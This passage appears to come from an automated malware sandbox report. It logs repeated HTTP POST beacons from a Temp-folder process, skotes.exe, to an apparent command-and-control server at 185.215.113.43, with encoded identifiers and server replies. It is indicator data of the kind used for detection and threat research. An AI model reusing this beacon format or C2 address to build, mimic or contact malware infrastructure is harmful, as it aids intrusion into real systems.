Dec 10, 2024 00:45:49.570595026 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:45:50.921981096 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	50238	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:52.671329975 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:45:54.000648975 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	50239	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:55.649029016 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:45:57.016983032 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	50240	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:45:58.772222996 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:46:00.120668888 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:45:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	50242	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:01.765494108 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:46:03.126539946 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	50243	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:04.860004902 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:46:06.207612991 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	50244	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:07.837816000 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:46:09.169859886 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	50245	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:10.915031910 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:46:12.243758917 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	50246	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:13.870980024 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:46:15.227765083 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	50247	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:16.970845938 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:46:18.318855047 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	50249	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:21.600260019 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:46:22.961759090 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	50250	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:24.594652891 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:46:25.947344065 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	50252	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:27.695882082 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:46:29.023246050 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	50253	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:30.652919054 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:46:32.006177902 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	50254	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:33.747452974 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:46:35.097122908 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	50255	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:36.742399931 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:46:38.095652103 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	50256	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:39.842108011 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:46:41.210882902 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	50257	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:42.840888977 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:46:44.195072889 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	50258	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:45.940335989 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:46:47.300195932 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	50259	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:48.936184883 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:46:50.267621040 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	50261	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:52.014996052 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:46:53.352888107 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	50262	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:54.988940001 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:46:56.342849016 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	50263	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:46:58.088915110 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:46:59.413470984 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:46:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	50264	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:01.042979002 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: 